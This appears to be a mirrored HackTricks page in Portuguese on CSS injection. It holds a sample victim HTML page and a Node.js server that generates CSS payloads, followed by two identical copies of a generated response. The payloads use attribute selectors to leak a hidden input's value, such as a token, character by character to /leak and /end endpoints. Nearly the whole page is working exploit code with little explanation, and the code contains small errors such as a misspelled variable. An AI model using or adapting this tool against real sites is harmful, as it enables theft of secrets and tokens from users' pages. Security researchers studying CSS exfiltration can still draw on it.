mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-26 04:53:39 +00:00
246 lines
12 KiB
Markdown
246 lines
12 KiB
Markdown
# Código de Injeção de CSS
|
|
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
- Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
|
|
|
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
|
|
- Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
|
|
- **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
|
|
- **Compartilhe seus truques de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
|
|
</details>
|
|
|
|
{% code title="victim.html" %}
|
|
```html
|
|
<!doctype html>
|
|
<body>
|
|
<div><article><div><p><div><div><div><div><div>
|
|
<input type="text" value="1234567890">
|
|
<style>
|
|
@import url('//localhost:5001/start?');
|
|
</style>
|
|
```
|
|
{% endcode %}
|
|
|
|
{% code title="server.js" %}
|
|
```javascript
|
|
const http = require('http');
|
|
const url = require('url');
|
|
|
|
// Port to exfiltrate to
|
|
const port = 5001;
|
|
// Host to exfiltrate to
|
|
const HOSTNAME = "http://localhost:5001";
|
|
const DEBUG = false;
|
|
|
|
var prefix = "", postfix = "";
|
|
var pending = [];
|
|
var stop = false, ready = 0, n = 0;
|
|
|
|
const requestHandler = (request, response) => {
|
|
let req = url.parse(request.url, url);
|
|
log('\treq: %s', request.url);
|
|
|
|
//If stop, leakeage is finished
|
|
if (stop) return response.end();
|
|
|
|
switch (req.pathname) {
|
|
// This only launched when starting the leakeage
|
|
case "/start":
|
|
genResponse(response);
|
|
break;
|
|
|
|
// Everytime something is leaked
|
|
case "/leak":
|
|
response.end();
|
|
// If response comes with a pre, then we leaked some preffix s(E)cret
|
|
if (req.query.pre && prefix !== req.query.pre) {
|
|
prefix = req.query.pre;
|
|
|
|
// If response comes with a post, then we leaked some suffix secre(T)
|
|
} else if (req.query.post && postfix !== req.query.post) {
|
|
postfix = req.query.post;
|
|
} else {
|
|
break;
|
|
}
|
|
|
|
// Always a pre and a post response must arrived before responding the "next" @import (which is waiting for response)
|
|
if (ready == 2) {
|
|
genResponse(pending.shift());
|
|
ready = 0;
|
|
} else {
|
|
ready++;
|
|
log('\tleak: waiting others...');
|
|
}
|
|
break;
|
|
|
|
// While waiting for a pre and a post, the next @import is waiting to be responded
|
|
// by a new generated payload with another "pre" and "post"
|
|
case "/next":
|
|
if (ready == 2) {
|
|
genResponse(respose);
|
|
ready = 0;
|
|
} else {
|
|
pending.push(response);
|
|
ready++;
|
|
log('\tquery: waiting others...');
|
|
}
|
|
break;
|
|
|
|
// Called when the secret is leaked
|
|
case "/end":
|
|
stop = true;
|
|
console.log('[+] END: %s', req.query.token);
|
|
|
|
default:
|
|
response.end();
|
|
}
|
|
}
|
|
|
|
const genResponse = (response) => {
|
|
// Verbose output to know what do we know
|
|
console.log('...pre-payoad: ' + prefix);
|
|
console.log('...post-payoad: ' + postfix);
|
|
|
|
// Payload generation, you have an example of what is generated below
|
|
let css = '@import url('+ HOSTNAME + '/next?' + Math.random() + ');\n' +
|
|
[0,1,2,3,4,5,6,7,8,9,'a','b','c','d','e','f'].map(e => ('input[value$="' + e + postfix + '"]{--e'+n+':url(' + HOSTNAME + '/leak?post=' + e + postfix + ')}')).join('') +
|
|
'div '.repeat(n) + 'input{background:var(--e'+n+')}' +
|
|
[0,1,2,3,4,5,6,7,8,9,'a','b','c','d','e','f'].map(e => ('input[value^="' + prefix + e + '"]{--s'+n+':url(' + HOSTNAME + '/leak?pre=' + prefix + e +')}')).join('') +
|
|
'div '.repeat(n) + 'input{border-image:var(--s'+n+')}' +
|
|
'input[value='+ prefix + postfix + ']{list-style:url(' + HOSTNAME + '/end?token=' + prefix + postfix + '&)};';
|
|
|
|
response.writeHead(200, { 'Content-Type': 'text/css'});
|
|
response.write(css);
|
|
response.end();
|
|
n++;
|
|
}
|
|
|
|
|
|
// Server listening
|
|
const server = http.createServer(requestHandler)
|
|
|
|
server.listen(port, (err) => {
|
|
if (err) {
|
|
return console.log('[-] Error: something bad happened', err);
|
|
}
|
|
console.log('[+] Server is listening on %d', port);
|
|
})
|
|
|
|
function log() {
|
|
if (DEBUG) console.log.apply(console, arguments);
|
|
}
|
|
|
|
/*
|
|
HTTP/1.1 200 OK
|
|
Content-Type: text/css
|
|
Date: Fri, 01 Apr 2022 14:35:39 GMT
|
|
Connection: close
|
|
Content-Length: 2149
|
|
|
|
@import url(http://localhost:5001/next?0.7834603960990516);
|
|
input[value$="0"]{--e0:url(http://localhost:5001/leak?post=0)}
|
|
input[value$="1"]{--e0:url(http://localhost:5001/leak?post=1)}
|
|
input[value$="2"]{--e0:url(http://localhost:5001/leak?post=2)}
|
|
input[value$="3"]{--e0:url(http://localhost:5001/leak?post=3)}
|
|
input[value$="4"]{--e0:url(http://localhost:5001/leak?post=4)}
|
|
input[value$="5"]{--e0:url(http://localhost:5001/leak?post=5)}
|
|
input[value$="6"]{--e0:url(http://localhost:5001/leak?post=6)}
|
|
input[value$="7"]{--e0:url(http://localhost:5001/leak?post=7)}
|
|
input[value$="8"]{--e0:url(http://localhost:5001/leak?post=8)}
|
|
input[value$="9"]{--e0:url(http://localhost:5001/leak?post=9)}
|
|
input[value$="a"]{--e0:url(http://localhost:5001/leak?post=a)}
|
|
input[value$="b"]{--e0:url(http://localhost:5001/leak?post=b)}
|
|
input[value$="c"]{--e0:url(http://localhost:5001/leak?post=c)}
|
|
input[value$="d"]{--e0:url(http://localhost:5001/leak?post=d)}
|
|
input[value$="e"]{--e0:url(http://localhost:5001/leak?post=e)}
|
|
input[value$="f"]{--e0:url(http://localhost:5001/leak?post=f)}
|
|
input{background:var(--e0)}
|
|
input[value^="0"]{--s0:url(http://localhost:5001/leak?pre=0)}
|
|
input[value^="1"]{--s0:url(http://localhost:5001/leak?pre=1)}
|
|
input[value^="2"]{--s0:url(http://localhost:5001/leak?pre=2)}
|
|
input[value^="3"]{--s0:url(http://localhost:5001/leak?pre=3)}
|
|
input[value^="4"]{--s0:url(http://localhost:5001/leak?pre=4)}
|
|
input[value^="5"]{--s0:url(http://localhost:5001/leak?pre=5)}
|
|
input[value^="6"]{--s0:url(http://localhost:5001/leak?pre=6)}
|
|
input[value^="7"]{--s0:url(http://localhost:5001/leak?pre=7)}
|
|
input[value^="8"]{--s0:url(http://localhost:5001/leak?pre=8)}
|
|
input[value^="9"]{--s0:url(http://localhost:5001/leak?pre=9)}
|
|
input[value^="a"]{--s0:url(http://localhost:5001/leak?pre=a)}
|
|
input[value^="b"]{--s0:url(http://localhost:5001/leak?pre=b)}
|
|
input[value^="c"]{--s0:url(http://localhost:5001/leak?pre=c)}
|
|
input[value^="d"]{--s0:url(http://localhost:5001/leak?pre=d)}
|
|
input[value^="e"]{--s0:url(http://localhost:5001/leak?pre=e)}
|
|
input[value^="f"]{--s0:url(http://localhost:5001/leak?pre=f)}
|
|
input{border-image:var(--s0)}
|
|
input[value=]{list-style:url(http://localhost:5001/end?token=&)};
|
|
*/
|
|
|
|
/*
|
|
HTTP/1.1 200 OK
|
|
Content-Type: text/css
|
|
Date: Fri, 01 Apr 2022 14:35:39 GMT
|
|
Connection: close
|
|
Content-Length: 2149
|
|
|
|
@import url(http://localhost:5001/next?0.7834603960990516);
|
|
input[value$="0"]{--e0:url(http://localhost:5001/leak?post=0)}
|
|
input[value$="1"]{--e0:url(http://localhost:5001/leak?post=1)}
|
|
input[value$="2"]{--e0:url(http://localhost:5001/leak?post=2)}
|
|
input[value$="3"]{--e0:url(http://localhost:5001/leak?post=3)}
|
|
input[value$="4"]{--e0:url(http://localhost:5001/leak?post=4)}
|
|
input[value$="5"]{--e0:url(http://localhost:5001/leak?post=5)}
|
|
input[value$="6"]{--e0:url(http://localhost:5001/leak?post=6)}
|
|
input[value$="7"]{--e0:url(http://localhost:5001/leak?post=7)}
|
|
input[value$="8"]{--e0:url(http://localhost:5001/leak?post=8)}
|
|
input[value$="9"]{--e0:url(http://localhost:5001/leak?post=9)}
|
|
input[value$="a"]{--e0:url(http://localhost:5001/leak?post=a)}
|
|
input[value$="b"]{--e0:url(http://localhost:5001/leak?post=b)}
|
|
input[value$="c"]{--e0:url(http://localhost:5001/leak?post=c)}
|
|
input[value$="d"]{--e0:url(http://localhost:5001/leak?post=d)}
|
|
input[value$="e"]{--e0:url(http://localhost:5001/leak?post=e)}
|
|
input[value$="f"]{--e0:url(http://localhost:5001/leak?post=f)}
|
|
input{background:var(--e0)}
|
|
input[value^="0"]{--s0:url(http://localhost:5001/leak?pre=0)}
|
|
input[value^="1"]{--s0:url(http://localhost:5001/leak?pre=1)}
|
|
input[value^="2"]{--s0:url(http://localhost:5001/leak?pre=2)}
|
|
input[value^="3"]{--s0:url(http://localhost:5001/leak?pre=3)}
|
|
input[value^="4"]{--s0:url(http://localhost:5001/leak?pre=4)}
|
|
input[value^="5"]{--s0:url(http://localhost:5001/leak?pre=5)}
|
|
input[value^="6"]{--s0:url(http://localhost:5001/leak?pre=6)}
|
|
input[value^="7"]{--s0:url(http://localhost:5001/leak?pre=7)}
|
|
input[value^="8"]{--s0:url(http://localhost:5001/leak?pre=8)}
|
|
input[value^="9"]{--s0:url(http://localhost:5001/leak?pre=9)}
|
|
input[value^="a"]{--s0:url(http://localhost:5001/leak?pre=a)}
|
|
input[value^="b"]{--s0:url(http://localhost:5001/leak?pre=b)}
|
|
input[value^="c"]{--s0:url(http://localhost:5001/leak?pre=c)}
|
|
input[value^="d"]{--s0:url(http://localhost:5001/leak?pre=d)}
|
|
input[value^="e"]{--s0:url(http://localhost:5001/leak?pre=e)}
|
|
input[value^="f"]{--s0:url(http://localhost:5001/leak?pre=f)}
|
|
input{border-image:var(--s0)}
|
|
input[value=]{list-style:url(http://localhost:5001/end?token=&)};
|
|
*/
|
|
```
|
|
{% endcode %}
|
|
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
- Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
|
|
|
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
|
|
- Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
|
|
- **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
|
|
- **Compartilhe seus truques de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
|
|
</details>
|